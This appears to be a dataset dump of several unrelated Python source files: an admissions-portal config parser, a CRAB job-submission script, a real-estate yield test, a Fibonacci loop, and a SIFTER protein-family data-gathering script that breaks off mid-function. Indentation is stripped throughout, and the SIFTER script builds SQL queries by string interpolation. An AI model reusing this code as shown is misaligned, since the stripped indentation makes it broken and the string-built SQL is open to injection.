text
stringlengths 8
6.05M
|
|---|
import re
import sys
import numpy as np
from Portal.AdmissionDetails.AdmissionDetails import AdmissionDetails
from Portal.PersonalDetails.PersonalAttr import PersonalAttr
from Portal.PersonalDetails.PersonalDetails import PersonalDetails
from Portal.EducationalQualifications.EducationalQualifications import EducationalQualifications
from Portal.EducationalQualifications.EduAttr import EduAttr
from Portal.WorkExperience.WorkExperience import WorkExperience
from Portal.Attachments.Attachments import Attachments
from Portal.Attachments.AttachmentInfo import AttachmentInfo
from Portal.Attachments.Attachment import Attachment
from Portal.Constraints.ConstraintValidator import ConstraintValidator
from Portal.EducationalQualifications.SubAttr import SubAttr
from Portal.Constraints.ConstraintValidator import AttachmentConstraintValidator
class ConfigParser(object):
def __init__(self,configFilePath):
self.configFilePath = configFilePath
self.configFile = None
self.fileData = None
with open(self.configFilePath, 'r') as self.configFile:
self.fileData = self.configFile.read()
self.ADStartPattern = "AdmissionDetails:" #AD abbreviation for AdmissionDetails
self.ADEndPattern = "AdmissionDetailsEnd:"
self.PDStartPattern = "PersonalDetails:" #PD abbreviation for PersonalDetails
self.PDEndPattern = "PersonalDetailsEnd:"
self.PAStartPattern = "PersonalAttr:" #PA abbreviation for PersonalAttr
self.PAEndPattern = "PersonalAttrEnd:"
self.EQStartPattern = "EducationalQualifications:" #EQ abbreviation for EducationalQualifications
self.EQEndPattern = "EducationalQualificationsEnd:"
self.EAStartPattern = "EduAttr:" #EA abbreviation for EduAttr
self.EAEndPattern = "EduAttrEnd:"
self.SAStartPattern = "SubAttr:" #SA abbreviation for SubAttr
self.SAEndPattern = "SubAttrEnd:"
self.WEStartPattern = "WorkExperiences:" #WE abbreviation for WorkExperiences
self.WEEndPattern = "WorkExperiencesEnd:"
self.ASStartPattern = "Attachments:" #AS abbreviation for Attachments
self.ASEndPattern = "AttachmentsEnd:"
self.AIStartPattern = "AttachmentInfo:" #AI abbreviation for AttachmentInfo
self.AIEndPattern = "AttachmentInfoEnd:"
self.AStartPattern = "Attachment:" #A abbreviation for Attachment
self.AEndPattern = "AttachmentEnd:"
def getAdmissionDetails(self):
admissionInfo = AdmissionDetails()
ADregex = str(self.ADStartPattern + "((.|\n)*?)" + self.ADEndPattern)
AD = re.findall(ADregex, self.fileData)
for ADBlock in AD:
ADBlockInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', ADBlock[0])
for info in ADBlockInfo:
if (info[0].lower() == "AdmissionDegree".lower()):
admissionInfo.AdmissionDegree = info[1]
elif (info[0].lower() == "AdmissionType".lower()):
admissionInfo.AdmissionType = info[1]
elif (info[0].lower() == "AdmissionMonth".lower()):
admissionInfo.AdmissionMonth = info[1]
elif (info[0].lower() == "AdmissionYear".lower()):
admissionInfo.AdmissionYear = info[1]
else:
print (info[0])
raise ValueError('Invalid field ' + info[0] + ' in config')
return admissionInfo
def getPersonalDetailsInfo(self):
personalDetails = PersonalDetails()
PDregex = str(self.PDStartPattern + "((.|\n)*?)" + self.PDEndPattern)
PD = str(re.findall(PDregex, self.fileData)[0][0])
PAregex = str(self.PAStartPattern + "((.|\n)*?)" + self.PAEndPattern)
PAs = re.findall(PAregex, PD)
PAs = [pa[0] for pa in PAs]
listOfPersonalAttr = []
listOfUniqeNames = []
for PABlock in PAs:
SAregex = str(self.SAStartPattern + "((.|\n)*?)" + self.SAEndPattern)
PAInfo = re.sub(SAregex, '', str(PABlock))
PAInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', str(PAInfo))
personalAttr = PersonalAttr()
for info in PAInfo:
if (info[0].lower() == "PersonalAttrName".lower()):
personalAttr.PersonalAttrName = info[1]
elif (info[0].lower() == "PersonalAttrLabel".lower()):
personalAttr.PersonalAttrLabel = info[1]
elif (info[0].lower() == "MultipleEntries".lower()):
personalAttr.MultipleEntries = info[1]
elif (info[0].lower() == "IsOptional".lower()):
personalAttr.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' for PersonalAttr')
SAs = re.findall(SAregex, str(PABlock))
listOfSubAttr = []
for SABlock in SAs:
SABlockInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', SABlock[0])
subAttr = SubAttr()
typeDict = {}
constraintDict = {}
for info in SABlockInfo:
if (info[0].lower() == "SubAttrName".lower()):
subAttr.SubAttrName = info[1]
listOfUniqeNames.append(personalAttr.PersonalAttrName+"."+subAttr.SubAttrName)
elif (info[0].lower() == "SubAttrLabel".lower()):
subAttr.SubAttrLabel = info[1]
elif (info[0].lower() == "IsTypeString".lower()):
subAttr.IsTypeString = info[1]
typeDict['String'] = subAttr.IsTypeString
elif (info[0].lower() == "IsTypeInteger".lower()):
subAttr.IsTypeInteger = info[1]
typeDict['Integer'] = subAttr.IsTypeInteger
elif (info[0].lower() == "IsTypeFloat".lower()):
subAttr.IsTypeFloat = info[1]
typeDict['Float'] = subAttr.IsTypeFloat
elif (info[0].lower() == "IsTypeDate".lower()):
subAttr.IsTypeDate = info[1]
typeDict['Date'] = subAttr.IsTypeDate
elif (info[0].lower() == "IsTypeBoolean".lower()):
subAttr.IsTypeBoolean = info[1]
typeDict['Boolean'] = subAttr.IsTypeBoolean
elif (info[0].lower() == "SubAttrChoices".lower()):
subAttr.SubAttrChoices = info[1]
subAttr.SubAttrChoicesFilter = info[1]
elif (info[0].lower() == "StringConstraints".lower()):
subAttr.StringConstraints = info[1]
constraintDict['String'] = subAttr.StringConstraints
elif (info[0].lower() == "IntegerConstraints".lower()):
subAttr.IntegerConstraints = info[1]
constraintDict['Integer'] = subAttr.IntegerConstraints
elif (info[0].lower() == "FPConstraints".lower()):
subAttr.FPConstraints = info[1]
constraintDict['Float'] = subAttr.FPConstraints
elif (info[0].lower() == "BooleanConstraints".lower()):
subAttr.BooleanConstraints = info[1]
constraintDict['Boolean'] = subAttr.BooleanConstraints
elif (info[0].lower() == "DateConstraints".lower()):
subAttr.DateConstraints = info[1]
constraintDict['Date'] = subAttr.DateConstraints
elif (info[0].lower() == "IsOptional".lower()):
subAttr.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' in config')
constraintValidator = ConstraintValidator(typeDict,constraintDict)
constraintValidator.validate()
listOfSubAttr.append(subAttr)
personalAttr.ListOfSubAttr = listOfSubAttr
listOfPersonalAttr.append(personalAttr)
personalDetails.listOfPersonalAttr = listOfPersonalAttr
if (len(listOfUniqeNames) != len(list(set(listOfUniqeNames)))):
raise ValueError('PersonalAttrName.SubAttrName must be unique in PersonalDetails')
return personalDetails
def getEducationalQualificationsInfo(self):
educationalQualifications = EducationalQualifications()
EQregex = str(self.EQStartPattern + "((.|\n)*?)" + self.EQEndPattern)
EQ = str(re.findall(EQregex, self.fileData)[0][0])
EAregex = str(self.EAStartPattern + "((.|\n)*?)" + self.EAEndPattern)
EAs = re.findall(EAregex, EQ)
EAs = [ea[0] for ea in EAs]
listOfEduAttr = []
listOfUniqeNames = []
for EABlock in EAs:
SAregex = str(self.SAStartPattern + "((.|\n)*?)" + self.SAEndPattern)
EAInfo = re.sub(SAregex, '', str(EABlock))
EAInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', str(EAInfo))
eduAttr = EduAttr()
for info in EAInfo:
if (info[0].lower() == "EduAttrName".lower()):
eduAttr.EduAttrName = info[1]
elif (info[0].lower() == "EduAttrLabel".lower()):
eduAttr.EduAttrLabel = info[1]
elif (info[0].lower() == "MultipleEntries".lower()):
eduAttr.MultipleEntries = info[1]
elif (info[0].lower() == "IsOptional".lower()):
eduAttr.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' for EduAttr')
SAs = re.findall(SAregex, str(EABlock))
listOfSubAttr = []
for SABlock in SAs:
SABlockInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', SABlock[0])
subAttr = SubAttr()
typeDict = {}
constraintDict = {}
for info in SABlockInfo:
if (info[0].lower() == "SubAttrName".lower()):
subAttr.SubAttrName = info[1]
listOfUniqeNames.append(eduAttr.EduAttrName+"."+subAttr.SubAttrName)
elif (info[0].lower() == "SubAttrLabel".lower()):
subAttr.SubAttrLabel = info[1]
elif (info[0].lower() == "IsTypeString".lower()):
subAttr.IsTypeString = info[1]
typeDict['String'] = subAttr.IsTypeString
elif (info[0].lower() == "IsTypeInteger".lower()):
subAttr.IsTypeInteger = info[1]
typeDict['Integer'] = subAttr.IsTypeInteger
elif (info[0].lower() == "IsTypeFloat".lower()):
subAttr.IsTypeFloat = info[1]
typeDict['Float'] = subAttr.IsTypeFloat
elif (info[0].lower() == "IsTypeDate".lower()):
subAttr.IsTypeDate = info[1]
typeDict['Date'] = subAttr.IsTypeDate
elif (info[0].lower() == "IsTypeBoolean".lower()):
subAttr.IsTypeBoolean = info[1]
typeDict['Boolean'] = subAttr.IsTypeBoolean
elif (info[0].lower() == "SubAttrChoices".lower()):
subAttr.SubAttrChoices = info[1]
subAttr.SubAttrChoicesFilter = info[1]
elif (info[0].lower() == "StringConstraints".lower()):
subAttr.StringConstraints = info[1]
constraintDict['String'] = subAttr.StringConstraints
elif (info[0].lower() == "IntegerConstraints".lower()):
subAttr.IntegerConstraints = info[1]
constraintDict['Integer'] = subAttr.IntegerConstraints
elif (info[0].lower() == "FPConstraints".lower()):
subAttr.FPConstraints = info[1]
constraintDict['Float'] = subAttr.FPConstraints
elif (info[0].lower() == "BooleanConstraints".lower()):
subAttr.BooleanConstraints = info[1]
constraintDict['Boolean'] = subAttr.BooleanConstraints
elif (info[0].lower() == "DateConstraints".lower()):
subAttr.DateConstraints = info[1]
constraintDict['Date'] = subAttr.DateConstraints
elif (info[0].lower() == "IsOptional".lower()):
subAttr.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' in config')
constraintValidator = ConstraintValidator(typeDict,constraintDict)
constraintValidator.validate()
listOfSubAttr.append(subAttr)
eduAttr.ListOfSubAttr = listOfSubAttr
listOfEduAttr.append(eduAttr)
educationalQualifications.listOfEduAttr = listOfEduAttr
if (len(listOfUniqeNames) != len(list(set(listOfUniqeNames)))):
raise ValueError('EduAttrName.SubAttrName must be unique in EducationalQualifications')
return educationalQualifications
def getWorkExperienceInfo(self):
workExperience = WorkExperience()
WEregex = str(self.WEStartPattern + "((.|\n)*?)" + self.WEEndPattern)
WE = str(re.findall(WEregex, self.fileData)[0][0])
SAregex = str(self.SAStartPattern + "((.|\n)*?)" + self.SAEndPattern)
WEInfo = re.sub(SAregex, '', str(WE))
WEInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', str(WEInfo))
for info in WEInfo:
if (info[0].lower() == "MultipleEntries".lower()):
workExperience.MultipleEntries = info[1]
elif (info[0].lower() == "IsOptional".lower()):
workExperience.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' for WorkExperience in config')
SAs = re.findall(SAregex, WE)
listOfSubAttr = []
listOfUniqeNames = []
for SABlock in SAs:
SABlockInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', SABlock[0])
subAttr = SubAttr()
typeDict = {}
constraintDict = {}
for info in SABlockInfo:
if (info[0].lower() == "SubAttrName".lower()):
subAttr.SubAttrName = info[1]
listOfUniqeNames.append(subAttr.SubAttrName)
elif (info[0].lower() == "SubAttrLabel".lower()):
subAttr.SubAttrLabel = info[1]
elif (info[0].lower() == "IsTypeString".lower()):
subAttr.IsTypeString = info[1]
typeDict['String'] = subAttr.IsTypeString
elif (info[0].lower() == "IsTypeInteger".lower()):
subAttr.IsTypeInteger = info[1]
typeDict['Integer'] = subAttr.IsTypeInteger
elif (info[0].lower() == "IsTypeFloat".lower()):
subAttr.IsTypeFloat = info[1]
typeDict['Float'] = subAttr.IsTypeFloat
elif (info[0].lower() == "IsTypeDate".lower()):
subAttr.IsTypeDate = info[1]
typeDict['Date'] = subAttr.IsTypeDate
elif (info[0].lower() == "IsTypeBoolean".lower()):
subAttr.IsTypeBoolean = info[1]
typeDict['Boolean'] = subAttr.IsTypeBoolean
elif (info[0].lower() == "SubAttrChoices".lower()):
subAttr.SubAttrChoices = info[1]
subAttr.SubAttrChoicesFilter = info[1]
elif (info[0].lower() == "StringConstraints".lower()):
subAttr.StringConstraints = info[1]
constraintDict['String'] = subAttr.StringConstraints
elif (info[0].lower() == "IntegerConstraints".lower()):
subAttr.IntegerConstraints = info[1]
constraintDict['Integer'] = subAttr.IntegerConstraints
elif (info[0].lower() == "FPConstraints".lower()):
subAttr.FPConstraints = info[1]
constraintDict['Float'] = subAttr.FPConstraints
elif (info[0].lower() == "BooleanConstraints".lower()):
subAttr.BooleanConstraints = info[1]
constraintDict['Boolean'] = subAttr.BooleanConstraints
elif (info[0].lower() == "DateConstraints".lower()):
subAttr.DateConstraints = info[1]
constraintDict['Date'] = subAttr.DateConstraints
elif (info[0].lower() == "IsOptional".lower()):
subAttr.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' in config')
constraintValidator = ConstraintValidator(typeDict,constraintDict)
constraintValidator.validate()
listOfSubAttr.append(subAttr)
workExperience.ListOfSubAttr = listOfSubAttr
if (len(listOfUniqeNames) != len(list(set(listOfUniqeNames)))):
raise ValueError('SubAttrName must be unique in WorkExperience')
return workExperience
def getAttachmentsInfo(self):
attachments = Attachments()
ASregex = str(self.ASStartPattern + "((.|\n)*?)" + self.ASEndPattern)
ASs = str(re.findall(ASregex, self.fileData)[0][0])
AIregex = str(self.AIStartPattern + "((.|\n)*?)" + self.AIEndPattern)
AIs = re.findall(AIregex, ASs)
AIs = [ai[0] for ai in AIs]
listOfAttachmentInfo = []
listOfUniqeNames = []
for AIBlock in AIs:
Aregex = str(self.AStartPattern + "((.|\n)*?)" + self.AEndPattern)
AIInfo = re.sub(Aregex, '', str(AIBlock))
AIInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', str(AIInfo))
attachmentInfo = AttachmentInfo()
for info in AIInfo:
if (info[0].lower() == "AttachmentInfoName".lower()):
attachmentInfo.AttachmentInfoName = info[1]
elif (info[0].lower() == "AttachmentInfoLabel".lower()):
attachmentInfo.AttachmentInfoLabel = info[1]
elif (info[0].lower() == "MultipleEntries".lower()):
attachmentInfo.MultipleEntries = info[1]
elif (info[0].lower() == "IsOptional".lower()):
attachmentInfo.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' for AttachmentInfo')
As = re.findall(Aregex, str(AIBlock))
listOfAttachment = []
for ABlock in As:
ABlockInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', ABlock[0])
attachment = Attachment()
typeDict = {}
for info in ABlockInfo:
if (info[0].lower() == "AttachmentName".lower()):
attachment.AttachmentName = info[1]
listOfUniqeNames.append(attachmentInfo.AttachmentInfoName+"."+attachment.AttachmentName)
elif (info[0].lower() == "AttachmentLabel".lower()):
attachment.AttachmentLabel = info[1]
elif (info[0].lower() == "IsTypeFile".lower()):
attachment.IsTypeFile = info[1]
typeDict['IsTypeFile'] = attachment.IsTypeFile
elif (info[0].lower() == "IsTypeImage".lower()):
attachment.IsTypeImage = info[1]
typeDict['IsTypeImage'] = attachment.IsTypeImage
elif (info[0].lower() == "IsOptional".lower()):
attachment.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' in config')
attachmentConstraintValidator = AttachmentConstraintValidator(typeDict)
attachmentConstraintValidator.validate()
listOfAttachment.append(attachment)
attachmentInfo.ListOfAttachment = listOfAttachment
listOfAttachmentInfo.append(attachmentInfo)
attachments.listOfAttachmentInfo = listOfAttachmentInfo
if (len(listOfUniqeNames) != len(list(set(listOfUniqeNames)))):
raise ValueError('SubAttrName must be unique in WorkExperience')
return attachments
# def main():
# configParser = ConfigParser("/home/adildangui/Desktop/webDev/djangoProject/Portal/createForm.cfg")
# print (configParser.getAdmissionDetails())
# print (configParser.getEducationalQualificationsInfo().listOfEduAttr[2].ListOfSubAttr[0].IsTypeInteger)
# print (configParser.getWorkExperienceInfo())
# print (configParser.getAttachmentInfo())
# main()
|
"""treadmill.cli.admin tests"""
|
#!/usr/bin/env python
import subprocess, sys
from collections import namedtuple
Dataset = namedtuple('dataset', ['name', 'path' ])
Prod = namedtuple('prod', ['name' ])
#####################
def gitCheckForUncommittedChanges(repoDir):
cmd = ['git', 'diff', '--name-only', 'HEAD']
p = subprocess.Popen(cmd, cwd=repoDir, stdout=subprocess.PIPE)
p.wait()
(out, err) = p.communicate()
if (out != "") :
print "There are uncommited changes in", repoDir
print "Exiting."
sys.exit(-1)
def gitCheckForTag(repoDir):
cmd = ['git', 'describe', '--tags', '--exact-match', 'HEAD']
p = subprocess.Popen(cmd, cwd=repoDir, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.wait()
(out, err) = p.communicate()
if (err != "") :
print "There is no tag associated to HEAD in", repoDir
print "Exiting."
sys.exit(-1)
#####################
def launchProduction(prodConfig, datasets, checkUncommitedChanges = True, checkTag = True) :
if (checkUncommitedChanges) :
gitCheckForUncommittedChanges("../IPHCFlatTree/")
else :
print "====================================================================="
print " * Warning * Skipping check for uncommited changes in IPHCFlatTree !"
print "====================================================================="
if (checkTag) :
gitCheckForTag("../IPHCFlatTree/")
else :
print "==================================================================================="
print " * Warning * Skipping check for tag associated to current commit in IPHCFlatTree !"
print "==================================================================================="
print " ====== "
print " Submitting production named", prodConfig.name
print " ====== "
for dataset in datasets :
print " "
print " > Submitting task for dataset", dataset.name, "..."
print " "
# Write config file using template
with open("./crabConfig.py","w") as f :
f.write('datasetName="'+dataset.name+'"\n')
f.write('datasetPath="'+dataset.path+'"\n')
f.write('prodTag="'+prodConfig.name+'"\n')
# Dump crab config template
with open("common/crabConfigTemplate.py","r") as template :
for line in template :
f.write(line)
f.close()
# Submit task
cmd = ['crab', 'submit']
p = subprocess.Popen(cmd)
p.wait()
|
"""Top-level package for Math Trees."""
__author__ = """Sean Boyle"""
__email__ = 'sean.boyle@pearson.com'
__version__ = '0.1.0'
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
import os
import json
from analyse_immo.factory import Factory
from analyse_immo.rendement import Rendement
# from analyse_immo.database import Database
# from analyse_immo.impots.annexe_2044 import Annexe_2044
class TestSimulationB(unittest.TestCase):
'''
Les données sont incompletes ...
prix de l'annonce: 120K
montant offre: 95K, 85K(-10%), 76K(-20%)
% de nego: 20.83%, 28.75%, 36.67%
notaire: 7600, 6840, 6080
Travaux: 91780.27, 91780.27, 91780.27
Total: 194380, 184120, 173860
Loyer HC mensuel: 1650, .., ..
Taxe Fonciere: 1700, x, x
Gestion (annuel): 7%, 1386
Surface: 170
prix m2 assurance: 1.50
Assurance: 255
Credit taux: 2%
duree: 20
mensualite: 981.67, 929.86, 878.04
Cashflow annuel: 4679, 5301, 5923
Renta Brut: 10.60, 11.17, 11.80
Renta Nette (avant impot): 8.47, 8.94, 9.47
'''
def setUp(self):
__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
__DATA_TEST_PATHNAME = os.path.join(__location__, 'data', 'input_test_simulation_B.json')
with open(__DATA_TEST_PATHNAME, 'r') as file:
input_data = json.load(file)
self.achat_data = input_data['achat']
self.lots_data = input_data['lots']
self.credit_data = input_data['credit']
self.bi = Factory.make_bien_immo(self.achat_data, self.lots_data)
self.credit = Factory.make_credit(self.credit_data, self.bi)
self.rdt = Rendement(self.bi, self.credit)
# database = Database()
# self.irr = Annexe_2044(database, self.bi, self.credit, 0.11)
def testOffre(self):
self.assertEqual(self.bi.notaire_montant, 7600)
self.assertEqual(self.bi.notaire_taux, 0.08)
self.assertAlmostEqual(self.bi.financement_total, 194380, 0)
@unittest.skip('fixme')
def testCredit(self):
self.assertAlmostEqual(self.credit.get_mensualite_avec_assurance(), 981.67, 2)
@unittest.skip('fixme')
def testRendement(self):
self.assertAlmostEqual(self.rdt.rendement_brut, 0.1060, 4)
if __name__ == '__main__':
unittest.main()
|
n=int(input("Enter a limit:"))
a=0
b=1
s=0
for i in range(0,n):
s=a+b
a=b
b=s
print(s)
|
#!/usr/bin/python
import os
import pickle
from Bio import AlignIO,Phylo,SeqIO
from Bio.SeqRecord import SeqRecord
from Bio.Phylo import PhyloXMLIO,PhyloXML
import ete2
from ete2 import Phyloxml
import sys
import StringIO
import gzip
import subprocess
import getopt
import copy
import _mysql as mysql
import _mysql_exceptions as mysql_exceptions
import MySQLdb.cursors
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))+'/lib/pplacer_python_scripts')
from PplacerWrapper import GuppyWrapper
from PplacerWrapper import PplacerWrapper
from PfamHMMERAlign import PfamHMMERAlign
import Queue
import threading
import re
import random
def usage():
print "\n-----------------------------------------------------------------"
print "Usage: "
print " sifter_gather_family_data.py [options] <families_data_folder>"
print "-----------------------------------------------------------------\n"
print "Examples:"
print " sifter_gather_family_data.py -f PF12491,PF13820 ../example/fam_data\n"
print " sifter_gather_family_data.py -i ../example/family_list.txt ../example/fam_data\n"
print " sifter_gather_family_data.py -f PF09172 --dbaddr www.example.org --dbuser jack --dbpass 1234 ../example/fam_data\n"
print "This function gather necessary 'alignment', 'tree', and 'evidence' files needed to run SIFTER for each query family."
print "\nTo gather data for a set of sequences (of a novel genome) which is not already in Pfam, you may enter the sequences file, the pfam hit file (found by pfam_scan.pl), and the NCBI taxonomy ID of your geneome of interest:"
print "Examples:"
print " sifter_gather_family_data.py -f PF07083,PF14343,PF03818 --seq_file ../example/myseq.fasta --hit_file ../example/pfam_res.txt --taxid 1192197 ../example/fam_data\n"
print " sifter_gather_family_data.py -A --seq_file myseq.fasta --hit_file ../example/pfam_res.txt --taxid 1192197 ../example/fam_data\n"
print "@author Sayed Mohammad Ebrahim Sahraeian (mohammad@compbio.berkeley.edu)"
print "Please cite new paper:"
print "-Sahraeian SME, Luo KR, Brenner SE (2015)"
print "The SIFTER algorithm presented rin the following paper:"
print "- Engelhardt BE, Jordan MI, Srouji JR, Brenner SE. 2011. Genome-scale phylogenetic function annotation of large and diverse protein families. Genome Research 21:1969-1980. \n"
print "inputs:"
print " <families_data_folder> Path to the folder where the"
print " families data will be placed."
print "options: (you should only use one of -i or -f or -A options.)"
print " -f STRING List of Pfam families for which you"
print " want to gather necessary data."
print " (in comma seperated format)"
print " -i STRING Path to the input file where the lis"
print " of families are placed."
print " --seq_file STRING The fasta format input sequences file"
print " of the novel genome."
print " --hit_file STRING Output of pfam_scan.pl file on the "
print " novel genome. This file consists of"
print " the list of pfam hits for the genome."
print " --taxid INT The NCBI taxonomy ID of the genome. If"
print " the tax-ID is not in the species"
print " tree, you may enter the NCBI taxonomy"
print " ID of a close species."
print " -A Run on all Pfam families of queried"
print " novel genome."
print " -n INT Number of threads (Default=4)"
print " --dbaddr STRING Address of the MySQL database that"
print " has neccessary data for SIFTER"
print " [Default: localhost]"
print " --dbname STRING Name of the MySQL database that"
print " has neccessary data for SIFTER"
print " [Default: sifter_db]"
print " --dbuser STRING Name of the MySQL database that"
print " has neccessary data for SIFTER"
print " [Default: root]"
print " --dbpass STRING Password of the user for the MySQL"
print " database that has neccessary data"
print " for SIFTER [Default: '']"
print " -h Help. Print Usage."
def msql(query, db):
c = db.cursor()
c.execute(query)
results = c.fetchall()
c.close()
return results
# See how many sequences are in each family, add it to pfds
def get_pfds(pfams,db):
pfds={}
for p in pfams:
sql_q="""select pfamA.num_full, pfamA.number_species, pfamA.pfamA_id, pfamA.description, group_concat(go_id) as go_ids, group_concat(term) as go_terms from pfamA left join gene_ontology on gene_ontology.auto_pfamA = pfamA.auto_pfamA where pfamA.pfamA_acc='%s' group by pfamA_acc
"""%(p)
#AND Locus.type=1
#AND Synonym.type=2
r = msql(sql_q, db)
if r:
pfds[p]={}
for w in r[0].keys():
pfds[p][w]=r[0][w]
else:
print "%s is a wrong Pfam ID and will be excluded."%p
return pfds
# ##2-Extract alignment information for each Pfam family
def get_pfam_alignment_by_id(pfam_id, outpt_fname,db):
# Get file from MySQL query, gunzip, and save into query directory.
mysql_aq = "(select auto_pfamA from pfamA where pfamA_acc='" + pfam_id + "')"
mysql_q = "select alignment from alignments_and_trees " + "where auto_pfamA = "+mysql_aq+" " + "and type='full';"
gzipped = True# # this field is gzipped in the table
print mysql_q
res = msql(mysql_q, db)
print len(res)
if len(res) == 0:
return
t_data = ''
f_output = open(outpt_fname, "w")
if gzipped:
f_gzipped = StringIO.StringIO(res[0]['alignment'])
f = gzip.GzipFile(fileobj=f_gzipped, mode='rbU')
t_data = f.read()
f_output.write(t_data)
f.close()
f_gzipped.close()
else:
t_data = res[0]['alignment']
f_output.write(t_data)
f_output.close()
def get_alignment(pfam_id,my_db):
outpt_fname = alignment_folder+'/%s'%pfam_id
if not(os.path.isfile(outpt_fname+".fasta.gz")):
print "Saving alignment for", pfam_id
print ""
get_pfam_alignment_by_id(pfam_id=pfam_id, outpt_fname=outpt_fname+".sth",db=my_db)
AlignIO.convert(outpt_fname+".sth","stockholm",outpt_fname+".fasta","fasta")
if os.path.exists('%s.fasta.gz'%(outpt_fname)):
subprocess.check_call("rm %s.fasta.gz"%(outpt_fname),shell=True)
subprocess.check_call("gzip %s.fasta"%(outpt_fname),shell=True)
def find_pfam_hits_from_file(hit_file,my_sequence_file):
pplacer_queries={}
with open(hit_file, 'rb') as infile:
for line in infile:
line=line.strip()
if not line:
continue
if len(line)<3:
continue
if line[0]=="#" and not line[2]=="<":
continue
if line[0]=="#" and line[2]=="<":
keys=line.split('> <')
keys[0]=keys[0].split('<')[1]
keys[-1]=keys[-1].split('>')[0]
continue
row=line.split()
if not len(row)==15:
print "Number of columns are not writ in this line, will skip the line:\n %s"%line
continue
r={k:row[i] for i,k in enumerate(keys)}
if r['significance']=='1':
pfam_id=r['hmm acc'][0:r['hmm acc'].find('.')]
gene_pplacer_id=r['seq id']
gene_pplacer_id+='/'+r['envelope start']+'-'+r['envelope end']
if pfam_id not in pplacer_queries.keys():
pplacer_queries[pfam_id]=[{'pplacer_id':gene_pplacer_id,'id':r['seq id'],'seq_start':int(r['envelope start']),'seq_end':int(r['envelope end'])}]
else:
pplacer_queries[pfam_id].append({'pplacer_id':gene_pplacer_id,'id':r['seq id'],'seq_start':int(r['envelope start']),'seq_end':int(r['envelope end'])})
gene_seq={}
handle = open(my_sequence_file, "rU")
for record in SeqIO.parse(handle, "fasta") :
gene_seq[record.id]=record.seq
print "Your queried novel genome has:"
print len(gene_seq), "sequences"
print len(set([v['id'] for w in pplacer_queries.values() for v in w])), "genes in pfam"
print len(pplacer_queries), "pfam families\n"
return gene_seq, pplacer_queries
def find_tax_name(ncbi_taxid,db):
sql_q="""select species from ncbi_taxonomy where ncbi_taxid='%s' limit 1;
"""%(ncbi_taxid)
my_id = msql(sql_q, db)
if my_id:
my_id=my_id[0]['species']
return my_id
def find_ncbi_taxid(pfamseq_id,db):
sql_q="""select ncbi_taxid,species from pfamseq where pfamseq_id='%s';
"""%(pfamseq_id)
my_id = msql(sql_q, db)
if not my_id:
if pfamseq_id in gene_seq:
my_id=({'ncbi_taxid': my_taxid, 'species': my_taxid},)
return max([int(w['ncbi_taxid']) for w in my_id])
def find_taxid(unip_id,db):
sql_q="""select tax_id from goa_db where uniprot_id='%s';
"""%(unip_id)
my_id = msql(sql_q, db)
if my_id:
return max([int(w['tax_id']) for w in my_id])
else:
return my_id
def find_tax_id_unip(unip_id,db):
sql_q="""SELECT pfamseq_acc
FROM pfamseq
WHERE pfamseq_id='%s';
"""%(unip_id)
my_id = msql(sql_q, db)
if not(my_id):
tax_id=find_ncbi_taxid(unip_id,db)
if tax_id>0:
sp=find_tax_name(tax_id,db)
return(tax_id,sp)
if not(my_id):
if unip_id in gene_seq:
tax_id=my_taxid
sp=my_taxid
return(tax_id,sp)
else:
my_id=({'pfamseq_acc':unip_id.split('_')[0]},)
tax_id=find_taxid(my_id[0]['pfamseq_acc'],db)
if tax_id:
sp=find_tax_name(tax_id,db)
if sp:
return (tax_id,sp)
else:
return(tax_id,'')
sql_q="""SELECT ncbi_id
FROM uniprot_2_NCBI
WHERE uniprot_id='%s';
"""%(my_id[0]['pfamseq_acc'])
my_id2 = msql(sql_q, db)
if my_id2:
tax_id=max([w['ncbi_id'] for w in my_id2])
sp=find_tax_name(tax_id,db)
return (tax_id,sp)
else:
tax_id=find_ncbi_taxid(unip_id,db)
if tax_id>0:
sp=find_tax_name(tax_id,db)
return(tax_id,sp)
if unip_id in gene_seq:
tax_id=my_taxid
sp=my_taxid
return(tax_id,sp)
else:
p_code=unip_id.split('_')[1]
if p_code in zero_taxids:
tax_id=zero_taxids[p_code]
sp=find_tax_name(tax_id,db)
return (tax_id,sp)
else:
tax_id=0
sp=''
return (tax_id,sp)
def find_best_taxid(my_id,db):
my_id=int(my_id)
mynode=orig_sp_tree_0.search_nodes(name='%d'%my_id)
if mynode:
des=list(set([int(w.name) for w in mynode[0].iter_descendants()]) & set(all_species_txids))
if des:
return des[0],find_tax_name(des[0],db)
else:
for node in mynode[0].iter_ancestors():
if node.name=="NoName":
continue
des=list(set([int(w.name) for w in node.iter_descendants()]) & set(all_species_txids))
if des:
return des[0],find_tax_name(des[0],db)
return -my_id,''
#reconcile the tree
def reconcile_tree(gene_tree_file,reconciled_file,rec_tag,pfam_id,db):
if (os.path.isfile(rec_tag+'ids.pickle')) and (pplacer_flag==1):
id_information = pickle.load(open(rec_tag+'ids.pickle', 'rb'))
existing_genes=id_information['existing_genes']
Sequnces=[]
p_ids=[]
new_genes=set([w['id'] for w in pplacer_queries[pfam_id]])
if not (new_genes-set(existing_genes)):
print "All %s Genes for family %s have already been placed in the reconciled tree."%(len(new_genes),pfam_id)
print "Skip Reconciliation for %s"%pfam_id
return
txid_file=rec_tag+'txid.xml'
if not(os.path.isfile(rec_tag+'ids.pickle')) or not(os.path.isfile(reconciled_file+'.gz')) or (pplacer_flag==1):
print "Running Reconciliation for: %s"%pfam_id
rand_id=random.randint(1000000,9999999)
